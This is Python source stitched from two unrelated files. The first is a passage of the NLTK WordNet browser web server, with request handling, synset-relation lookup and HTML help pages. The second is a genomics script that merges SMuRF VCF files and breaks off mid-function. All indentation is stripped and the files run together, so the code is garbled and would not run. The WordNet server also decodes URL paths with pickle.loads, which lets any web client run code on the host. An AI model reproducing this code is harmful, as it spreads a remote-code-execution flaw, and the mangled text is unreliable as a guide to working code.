# TODO add a variation of this that takes a non ecoded word or MWE.
type = 'text/html'
sp = sp[len("lookup_"):]
page, word = page_from_href(sp)
elif sp == "start_page":
# if this is the first request we should display help
# information, and possibly set a default word.
type = 'text/html'
page, word = page_from_word("wordnet")
else:
type = 'text/plain'
page = "Could not parse request: '%s'" % sp
# Send result.
self.send_head(type)
self.wfile.write(page.encode('utf8'))
def send_head(self, type=None):
self.send_response(200)
self.send_header('Content-type', type)
self.end_headers()
def log_message(self, format, *args):
global logfile
if logfile:
logfile.write(
"%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
def get_unique_counter_from_url(sp):
"""
Extract the unique counter from the URL if it has one. Otherwise return
null.
"""
pos = sp.rfind('%23')
if pos != -1:
return int(sp[(pos + 3):])
else:
return None
def wnb(port=8000, runBrowser=True, logfilename=None):
"""
Run NLTK Wordnet Browser Server.
:param port: The port number for the server to listen on, defaults to
8000
:type port: int
:param runBrowser: True to start a web browser and point it at the web
server.
:type runBrowser: bool
"""
# The webbrowser module is unpredictable, typically it blocks if it uses
# a console web browser, and doesn't block if it uses a GUI webbrowser,
# so we need to force it to have a clear correct behaviour.
#
# Normally the server should run for as long as the user wants. they
# should idealy be able to control this from the UI by closing the
# window or tab. Second best would be clicking a button to say
# 'Shutdown' that first shutsdown the server and closes the window or
# tab, or exits the text-mode browser. Both of these are unfreasable.
#
# The next best alternative is to start the server, have it close when
# it receives SIGTERM (default), and run the browser as well. The user
# may have to shutdown both programs.
#
# Since webbrowser may block, and the webserver will block, we must run
# them in separate threads.
#
global server_mode, logfile
server_mode = not runBrowser
# Setup logging.
if logfilename:
try:
logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
except IOError as e:
sys.stderr.write("Couldn't open %s for writing: %s",
logfilename, e)
sys.exit(1)
else:
logfile = None
# Compute URL and start web browser
url = 'http://localhost:' + str(port)
if runBrowser:
server_ready = threading.Event()
browser_thread = startBrowser(url, server_ready)
# Start the server.
server = HTTPServer(('', port), MyServerHandler)
if logfile:
logfile.write(
'NLTK Wordnet browser server running serving: %s\n' % url)
if runBrowser:
server_ready.set()
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if runBrowser:
browser_thread.join()
def startBrowser(url, server_ready):
def run():
server_ready.wait()
time.sleep(1) # Wait a little bit more, there's still the chance of
# a race condition.
webbrowser.open(url, new = 2, autoraise = 1)
t = threading.Thread(target=run)
t.start()
return t
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
return [
(wn.NOUN,'N','noun'),
(wn.VERB,'V','verb'),
(wn.ADJ,'J','adj'),
(wn.ADV,'R','adv')]
def _pos_match(pos_tuple):
"""
This function returns the complete pos tuple for the partial pos
tuple given to it. It attempts to match it against the first
non-null component of the given pos tuple.
"""
if pos_tuple[0] == 's':
pos_tuple = ('a', pos_tuple[1], pos_tuple[2])
for n,x in enumerate(pos_tuple):
if x is not None:
break
for pt in _pos_tuples():
if pt[n] == pos_tuple[n]: return pt
return None
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_CATEGORY = 21
CLASS_USAGE = 22
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
def flattern(l):
if l == []:
return []
else:
return l[0] + flattern(l[1:])
return flattern([func(l) for l in synset.lemmas if l.name == word])
def rebuild_tree(orig_tree):
node = orig_tree[0]
children = orig_tree[1:]
return (node, [rebuild_tree(t) for t in children])
def get_relations_data(word, synset):
"""
Get synset relations data for a synset. Note that this doesn't
yet support things such as full hyponym vs direct hyponym.
"""
if synset.pos == wn.NOUN:
return ((HYPONYM, 'Hyponyms',
synset.hyponyms()),
(INSTANCE_HYPONYM , 'Instance hyponyms',
synset.instance_hyponyms()),
(HYPERNYM, 'Direct hypernyms',
synset.hypernyms()),
(INDIRECT_HYPERNYMS, 'Indirect hypernyms',
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1]),
# hypernyms', 'Sister terms',
(INSTANCE_HYPERNYM , 'Instance hypernyms',
synset.instance_hypernyms()),
# (CLASS_REGIONAL, ['domain term region'], ),
(PART_HOLONYM, 'Part holonyms',
synset.part_holonyms()),
(PART_MERONYM, 'Part meronyms',
synset.part_meronyms()),
(SUBSTANCE_HOLONYM, 'Substance holonyms',
synset.substance_holonyms()),
(SUBSTANCE_MERONYM, 'Substance meronyms',
synset.substance_meronyms()),
(MEMBER_HOLONYM, 'Member holonyms',
synset.member_holonyms()),
(MEMBER_MERONYM, 'Member meronyms',
synset.member_meronyms()),
(ATTRIBUTE, 'Attributes',
synset.attributes()),
(ANTONYM, "Antonyms",
lemma_property(word, synset, lambda l: l.antonyms())),
(DERIVATIONALLY_RELATED_FORM, "Derivationally related form",
lemma_property(word, synset, lambda l: l.derivationally_related_forms())))
elif synset.pos == wn.VERB:
return ((ANTONYM, 'Antonym',
lemma_property(word, synset, lambda l: l.antonyms())),
(HYPONYM, 'Hyponym',
synset.hyponyms()),
(HYPERNYM, 'Direct hypernyms',
synset.hypernyms()),
(INDIRECT_HYPERNYMS, 'Indirect hypernyms',
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1]),
(ENTAILMENT, 'Entailments',
synset.entailments()),
(CAUSE, 'Causes',
synset.causes()),
(ALSO_SEE, 'Also see',
synset.also_sees()),
(VERB_GROUP, 'Verb Groups',
synset.verb_groups()),
(DERIVATIONALLY_RELATED_FORM, "Derivationally related form",
lemma_property(word, synset, lambda l: l.derivationally_related_forms())))
elif synset.pos == wn.ADJ or synset.pos == wn.ADJ_SAT:
return ((ANTONYM, 'Antonym',
lemma_property(word, synset, lambda l: l.antonyms())),
(SIMILAR, 'Similar to',
synset.similar_tos()),
# Participle of verb - not supported by corpus
(PERTAINYM, 'Pertainyms',
lemma_property(word, synset, lambda l: l.pertainyms())),
(ATTRIBUTE, 'Attributes',
synset.attributes()),
(ALSO_SEE, 'Also see',
synset.also_sees()))
elif synset.pos == wn.ADV:
# This is weird. adverbs such as 'quick' and 'fast' don't seem
# to have antonyms returned by the corpus.a
return ((ANTONYM, 'Antonym',
lemma_property(word, synset, lambda l: l.antonyms())),)
# Derived from adjective - not supported by corpus
else:
raise TypeError("Unhandles synset POS type: " + str(synset.pos))
html_header = '''
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
'''
html_trailer = '''
</body>
</html>
'''
explanation = '''
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
'''
# HTML oriented functions
def _bold(txt): return '<b>%s</b>' % txt
def _center(txt): return '<center>%s</center>' % txt
def _hlev(n,txt): return '<h%d>%s</h%d>' % (n,txt,n)
def _italic(txt): return '<i>%s</i>' % txt
def _li(txt): return '<li>%s</li>' % txt
def pg(word, body):
'''
Return a HTML page of NLTK Browser format constructed from the
word and body
:param word: The word that the body corresponds to
:type word: str
:param body: The HTML body corresponding to the word
:type body: str
:return: a HTML page for the word-body combination
:rtype: str
'''
return (html_header % word) + body + html_trailer
def _ul(txt): return '<ul>' + txt + '</ul>'
def _abbc(txt):
"""
abbc = asterisks, breaks, bold, center
"""
return _center(_bold('<br>'*10 + '*'*10 + ' ' + txt + ' ' + '*'*10))
full_hyponym_cont_text = \
_ul(_li(_italic('(has full hyponym continuation)'))) + '\n'
def _get_synset(synset_key):
"""
The synset key is the unique name of the synset, this can be
retrived via synset.name
"""
return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
'''
Returns the HTML string for one synset or word
:param word: the current word
:type word: str
:param synset: a synset
:type synset: synset
:param synset_relations: information about which synset relations
to display.
:type synset_relations: dict(synset_key, set(relation_id))
:return: The HTML string built for this synset
:rtype: str
'''
if isinstance(synset, tuple): # It's a word
raise NotImplementedError("word not supported by _collect_one_synset")
typ = 'S'
pos_tuple = _pos_match((synset.pos, None, None))
assert pos_tuple is not None, "pos_tuple is null: synset.pos: %s" % synset.pos
descr = pos_tuple[2]
ref = copy.deepcopy(Reference(word, synset_relations))
ref.toggle_synset(synset)
synset_label = typ + ";"
if synset.name in synset_relations:
synset_label = _bold(synset_label)
s = '<li>%s (%s) ' % (make_lookup_link(ref, synset_label), descr)
def format_lemma(w):
w = w.replace('_', ' ')
if w.lower() == word:
return _bold(w)
else:
ref = Reference(w)
return make_lookup_link(ref, w)
s += ', '.join(format_lemma(l.name) for l in synset.lemmas)
gl = " (%s) <i>%s</i> " % \
(synset.definition,
"; ".join("\"%s\"" % e for e in synset.examples))
return s + gl + _synset_relations(word, synset, synset_relations) + '</li>\n'
def _collect_all_synsets(word, pos, synset_relations=dict()):
"""
Return a HTML unordered list of synsets for the given word and
part of speech.
"""
return '<ul>%s\n</ul>\n' % \
''.join((_collect_one_synset(word, synset, synset_relations)
for synset
in wn.synsets(word, pos)))
def _synset_relations(word, synset, synset_relations):
'''
Builds the HTML string for the relations of a synset
:param word: The current word
:type word: str
:param synset: The synset for which we're building the relations.
:type synset: Synset
:param synset_relations: synset keys and relation types for which to display relations.
:type synset_relations: dict(synset_key, set(relation_type))
:return: The HTML for a synset's relations
:rtype: str
'''
if not synset.name in synset_relations:
return ""
ref = Reference(word, synset_relations)
def relation_html(r):
if isinstance(r, Synset):
return make_lookup_link(Reference(r.lemma_names[0]), r.lemma_names[0])
elif isinstance(r, Lemma):
return relation_html(r.synset)
elif isinstance(r, tuple):
# It's probably a tuple containing a Synset and a list of
# similar tuples. This forms a tree of synsets.
return "%s\n<ul>%s</ul>\n" % \
(relation_html(r[0]),
''.join('<li>%s</li>\n' % relation_html(sr) for sr in r[1]))
else:
raise TypeError("r must be a synset, lemma or list, it was: type(r) = %s, r = %s" % (type(r), r))
def make_synset_html(db_name, disp_name, rels):
synset_html = '<i>%s</i>\n' % \
make_lookup_link(
copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
disp_name)
if db_name in ref.synset_relations[synset.name]:
synset_html += '<ul>%s</ul>\n' % \
''.join("<li>%s</li>\n" % relation_html(r) for r in rels)
return synset_html
html = '<ul>' + \
'\n'.join(("<li>%s</li>" % make_synset_html(*rel_data) for rel_data
in get_relations_data(word, synset)
if rel_data[2] != [])) + \
'</ul>'
return html
class Reference(object):
"""
A reference to a page that may be generated by page_word
"""
def __init__(self, word, synset_relations=dict()):
"""
Build a reference to a new page.
word is the word or words (separated by commas) for which to
search for synsets of
synset_relations is a dictionary of synset keys to sets of
synset relation identifaiers to unfold a list of synset
relations for.
"""
self.word = word
self.synset_relations = synset_relations
def encode(self):
"""
Encode this reference into a string to be used in a URL.
"""
# This uses a tuple rather than an object since the python
# pickle representation is much smaller and there is no need
# to represent the complete object.
string = pickle.dumps((self.word, self.synset_relations), -1)
return base64.urlsafe_b64encode(string)
def toggle_synset_relation(self, synset, relation):
"""
Toggle the display of the relations for the given synset and
relation type.
This function will throw a KeyError if the synset is currently
not being displayed.
"""
if relation in self.synset_relations[synset.name]:
self.synset_relations[synset.name].remove(relation)
else:
self.synset_relations[synset.name].add(relation)
return self
def toggle_synset(self, synset):
"""
Toggle displaying of the relation types for the given synset
"""
if synset.name in self.synset_relations:
del self.synset_relations[synset.name]
else:
self.synset_relations[synset.name] = set()
return self
def decode_reference(string):
"""
Decode a reference encoded with Reference.encode
"""
string = base64.urlsafe_b64decode(string)
word, synset_relations = pickle.loads(string)
return Reference(word, synset_relations)
def make_lookup_link(ref, label):
return '<a href="lookup_%s">%s</a>' % (ref.encode(), label)
def page_from_word(word):
"""
Return a HTML page for the given word.
:param word: The currently active word
:type word: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference(word))
def page_from_href(href):
'''
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
'''
return page_from_reference(decode_reference(href))
def page_from_reference(href):
'''
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
'''
word = href.word
pos_forms = defaultdict(list)
words = word.split(',')
words = [w for w in [w.strip().lower().replace(' ', '_')
for w in words]
if w != ""]
if len(words) == 0:
# No words were found.
return "", "Please specify a word to search for."
# This looks up multiple words at once. This is probably not
# necessary and may lead to problems.
for w in words:
for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
form = wn.morphy(w, pos)
if form and form not in pos_forms[pos]:
pos_forms[pos].append(form)
body = ''
for pos,pos_str,name in _pos_tuples():
if pos in pos_forms:
body += _hlev(3, name) + '\n'
for w in pos_forms[pos]:
# Not all words of exc files are in the database, skip
# to the next word if a KeyError is raised.
try:
body += _collect_all_synsets(w, pos, href.synset_relations)
except KeyError:
pass
if not body:
body = "The word or words '%s' where not found in the dictonary." % word
return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
"""
Return a static HTML page from the path given.
"""
if path == "index_2.html":
return get_static_index_page(False)
elif path == "index.html":
return get_static_index_page(True)
elif path == "NLTK Wordnet Browser Database Info.html":
return "Display of Wordnet Database Statistics is not supported"
elif path == "upper_2.html":
return get_static_upper_page(False)
elif path == "upper.html":
return get_static_upper_page(True)
elif path == "web_help.html":
return get_static_web_help_page()
elif path == "wx_help.html":
return get_static_wx_help_page()
else:
return "Internal error: Path for static page '%s' is unknown" % path
f = open(path)
page = f.read()
f.close()
return page
def get_static_web_help_page():
"""
Return the static web help page.
"""
return \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2013 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://www.nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="http://wordnet.princeton.edu/"><b> http://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="http://nltk.sourceforge.net/"><b>http://nltk.sourceforge.net/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see the search result includes the synsets found in the same order than the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
"""
Get the static welcome page.
"""
return \
"""
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
"""
Get the static index page.
"""
template = \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2013 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://www.nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>
<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
if with_shutdown:
upper_link = "upper.html"
else:
upper_link = "upper_2.html"
return template % upper_link
def get_static_upper_page(with_shutdown):
"""
Return the upper frame page,
If with_shutdown is True then a 'shutdown' button is also provided
to shutdown the server.
"""
template = \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2013 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://www.nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word: <input type="text" id="currentWord" size="10" disabled>
Next Word: <input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
if with_shutdown:
shutdown_link = "<a href=\"SHUTDOWN THE SERVER\">Shutdown</a>"
else:
shutdown_link = ""
return template % shutdown_link
def usage():
"""
Display the command line help message.
"""
print(__doc__)
def app():
# Parse and interpret options.
(opts, _) = getopt.getopt(argv[1:], "l:p:sh",
["logfile=", "port=", "server-mode", "help"])
port = 8000
server_mode = False
help_mode = False
logfilename = None
for (opt, value) in opts:
if (opt == "-l") or (opt == "--logfile"):
logfilename = str(value)
elif (opt == "-p") or (opt == "--port"):
port = int(value)
elif (opt == "-s") or (opt == "--server-mode"):
server_mode = True
elif (opt == "-h") or (opt == "--help"):
help_mode = True
if help_mode:
usage()
else:
wnb(port, not server_mode, logfilename)
if __name__ == '__main__':
app()
__all__ = ['app']
|
merge_smurf_vcfs.py | #!/usr/bin/python
import vcf as pyvcf
import argparse
import re
import os
import sys
import collections
import multiprocessing as mp
import queue
import time
contig_list = []
def main():
for vcf_reader in vcf_readers:
for contig in vcf_reader.contigs:
if contig not in contig_list:
contig_list.append(contig)
# Create an input queue with the contigs and an empty output queue
q = mp.Queue()
q_out = mp.Queue()
for contig in contig_list:
q.put(contig)
# Create number of processes to parse the vcf file
processes = [mp.Process(target=parse_chr_vcfs, args=(q, q_out, vcf_readers)) for x in range(args.threads)]
for p in processes:
p.start()
liveprocs = list(processes)
while liveprocs:
time.sleep(5)
try:
while 1:
done = q_out.get(block=False, timeout=1)
except queue.Empty:
pass
# Give tasks a chance to put more data in
time.sleep(10)
if not q.empty():
continue
liveprocs = [p for p in liveprocs if p.is_alive()]
for p in processes:
p.join()
def get_command_line():
"""
Function to get the commandline arguments
Return: A string with the actual command.
"""
cmdline = [sys.argv[0]]
for arg in vars(args):
if type(getattr(args,arg)) is list:
for a in getattr(args,arg):
cmdline.append('--{} {}'.format(arg,str(a)))
else:
cmdline.append('--{} {}'.format(arg,str(getattr(args,arg))))
return( '"{}"'.format(" ".join(cmdline)) )
# Set arguments
parser = argparse.ArgumentParser()
parser = argparse.ArgumentParser(description='Put here a description.')
parser.add_argument('-i', '--input', action='append', type=str, help='Input indexed SMuRF.vcf.gz file', required=True)
parser.add_argument('-o', '--output', default="SMuRF", type=str, help='Name of output file (default: %(default)s)')
parser.add_argument('-t','--threads', default=8,type=int,help='Number of threads (default: %(default)s)')
args = parser.parse_args()
vcf_readers = []
header_samples = []
sample_names = []
normal_names = []
for input_file in args.input:
vcf_reader = pyvcf.Reader(filename=input_file, encoding='utf-8')
sample_names.extend( vcf_reader.samples )
header_samples.extend( vcf_reader.samples )
for control in re.findall(r"--normal\s+(\S+)", vcf_reader.metadata['SMuRFCmd'][0]):
if control != "None":
normal_names.append(control)
if control in sample_names:
sample_names.remove(control)
vcf_readers.append(vcf_reader)
vcf_name = os.path.basename(args.output)
#vcf_name = vcf_name.replace(".vcf.gz","")
# Create tmp directory if it does not exists
try:
os.stat('./SMuRF_tmp')
except:
os.mkdir('./SMuRF_tmp')
def parse_chr_vcfs(q, q_out, contig_vcf_readers):
while True:
try:
contig = q.get(block=False,timeout=1)
#contig_vcf_flag_writer = pyvcf.Writer(open('./SMuRF_tmp/{}_SMuRF_reannotate.vcf'.format(contig),'w', encoding='utf-8'), contig_vcf_reader)
#vcf_reader.metadata['SMuRF_merge'] = [get_command_line()]
merged_records = {}
for contig_vcf_reader in contig_vcf_readers:
record_dict = get_record_dict( contig, contig_vcf_reader)
if not record_dict:
continue
if not merged_records:
merged_records = record_dict
else:
merged_records = mergeDict( merged_records, record_dict )
if merged_records:
merge_records(merged_records, contig, contig_vcf_readers[0])
q_out.put( "Done" )
# Break the loop if the queue is empty
except queue.Empty:
break
def merge_records( merged_records, contig, contig_vcf_reader):
contig_vcf_reader.samples = header_samples
contig_vcf_flag_writer = pyvcf.Writer(open('./SMuRF_tmp/{}_SMuRF_merged.vcf'.format(contig),'w', encoding='utf-8'), contig_vcf_reader)
for key in merged_records:
if type(merged_records[key]) is list:
record = merged_records[key][0]
for record2 in merged_records[key][1:]:
if 'MERGED' not in record.INFO:
record.INFO['MERGED'] = 0
record.INFO['MERGED'] += 1
if record2.INFO['ABSENT_SAMPLE_NAMES'] != ['']:
record.INFO['ABSENT_SAMPLE_NAMES'].extend(record2.INFO['ABSENT_SAMPLE_NAMES'])
record.INFO['ABSENT_SAMPLES'] += record2.INFO['ABSENT_SAMPLES']
if record2.INFO['SUBCLONAL_SAMPLE_NAMES'] != ['']:
record.INFO['SUBCLONAL_SAMPLE_NAMES'].extend(record2.INFO['SUBCLONAL_SAMPLE_NAMES'])
record.INFO['SUBCLONAL_SAMPLES'] += record2.INFO['SUBCLONAL_SAMPLES']
if record2.INFO['CLONAL_SAMPLE_NAMES'] != ['']:
record.INFO['CLONAL_SAMPLE_NAMES'].extend(record2.INFO['CLONAL_SAMPLE_NAMES'])
record.INFO['CLONAL_SAMPLES'] += record2.INFO['CLONAL_SAMPLES']
if record2.INFO['ABSENT_CONTROL_NAMES'] != ['']:
record.INFO['ABSENT_CONTROL_NAMES'].extend(record2.INFO['ABSENT_CONTROL_NAMES'])
record.INFO['ABSENT_CONTROLS'] += record2.INFO['ABSENT_CONTROLS']
if record2.INFO['SUBCLONAL_CONTROL_NAMES'] != ['']:
record.INFO['SUBCLONAL_CONTROL_NAMES'].extend(record2.INFO['SUBCLONAL_CONTROL_NAMES'])
record.INFO['SUBCLONAL_CONTROLS'] += record2.INFO['SUBCLONAL_CONTROLS']
if record2.INFO['CLONAL_CONTROL_NAMES'] != ['']:
record.INFO['CLONAL_CONTROL_NAMES'].extend(record2.INFO['CLONAL_CONTROL_NAMES'])
record.INFO['CLONAL_CONTROLS'] += record2.INFO['CLONAL_CONTROLS']
if record2.INFO['FAIL_QC_SAMPLE_NAMES'] != ['']:
record.INFO['FAIL_QC_SAMPLE_NAMES'].extend(record2.INFO['FAIL_QC_SAMPLE_NAMES'])
record.INFO['FAIL_QC_SAMPLES'] += record2.INFO['FAIL_QC_SAMPLES']
if record2.INFO['PASS_QC_SAMPLE_NAMES'] != ['']:
record.INFO['PASS_QC_SAMPLE_NAMES'].extend(record2.INFO['PASS_QC_SAMPLE_NAMES'])
record.INFO['PASS_QC_SAMPLES'] += record2.INFO['PASS_QC_SAMPLES']
if 'FAIL_QC_CONTROL_NAMES' in record2.INFO and 'FAIL_QC_CONTROL_NAMES' in record.INFO and record2.INFO['FAIL_QC_CONTROL_NAMES'] != ['']:
record.INFO['FAIL_QC_CONTROL_NAMES'].extend(record2.INFO['FAIL_QC_CONTROL_NAMES'])
record.INFO['FAIL_QC_CONTROLS'] += record2.INFO['FAIL_QC_CONTROLS']
if 'PASS_QC_CONTROL_NAMES' in record2.INFO and 'PASS_QC_CONTROL_NAMES' in record.INFO and record2.INFO['PASS_QC_CONTROL_NAMES'] != ['']:
record.INFO['PASS_QC_CONTROL_NAMES'].extend(record2.INFO['PASS_QC_CONTROL_NAMES'])
record.INFO['PASS_QC_CONTROLS'] += record2.INFO['PASS_QC_CONTROLS']
record.samples.extend(record2.samples)
else:
record = merged_records[key]
format_field = record.FORMAT.split(":")
genotype = {}
for f in format_field:
if f == "GT":
genotype[f] = './.'
else:
genotype[f] = None
samples_data = []
for sample in header_samples:
if sample in sample_names:
if sample not in record.INFO['CLONAL_SAMPLE_NAMES'] and sample not in record.INFO['SUBCLONAL_SAMPLE_NAMES'] and sample not in record.INFO['ABSENT_SAMPLE_NAMES']:
record.INFO['ABSENT_SAMPLE_NAMES'].append(sample)
record.INFO['ABSENT_SAMPLES'] += 1
call = pyvcf.model._Call('site', sample, collections.namedtuple('CallData', format_field)(**genotype))
else:
call = pyvcf.model._Call('site', sample, record.genotype(sample).data)
samples_data.append(call)
if sample in normal_names:
if sample not in record.INFO['CLONAL_CONTROL_NAMES'] and sample not in record.INFO['SUBCLONAL_CONTROL_NAMES'] and sample not in record.INFO['ABSENT_CONTROL_NAMES']:
record.INFO['ABSENT_CONTROL_NAMES'].append(sample)
record.INFO['ABSENT_CONTROLS'] += 1
call = pyvcf.model._Call('site', sample, collections.namedtuple('CallData', format_field)(**genotype))
else:
call = pyvcf.model._Call('site', sample, record.genotype(sample).data)
samples_data.append(call)
record.samples = samples_data
if record.INFO['CLONAL_SAMPLES'] == 0:
record.FILTER.append('NoClonalSample')
if record.INFO['CLONAL_CONTROLS'] > 0:
record.FILTER.append('ControlClonal')
if record.INFO['SUBCLONAL_CONTROLS'] > 0:
record.FILTER.append('ControlSubclonal')
# if not record.FILTER:
contig_vcf_flag_writer.write_record(record)
def mergeDict(dict1, dict2):
''' Merge dictionaries and keep values of common keys in list'''
dict3 = {**dict1, **dict2}
for key, value in dict3.items():
if key in dict1 and key in dict2:
dict3[key] = [value , dict1[key]]
return dict3
def get_record_dict(contig, contig_vcf_reader):
record_dict = {}
try:
# Try to parse the specific contig from the vcf
contig_vcf_reader.fetch(contig)
except:
# Skip contig if it is not present in the vcf file
return( False )
for record in contig_vcf_reader.fetch(contig):
for fil in ['NoClonalSample','ControlClonal','ControlSubclonal']:
if fil in record.FILTER:
record.FILTER.remove(fil)
if not record.FILTER:
alt = ",".join(list(map(str, record.ALT)))
record_dict[(contig,record.POS)] = record
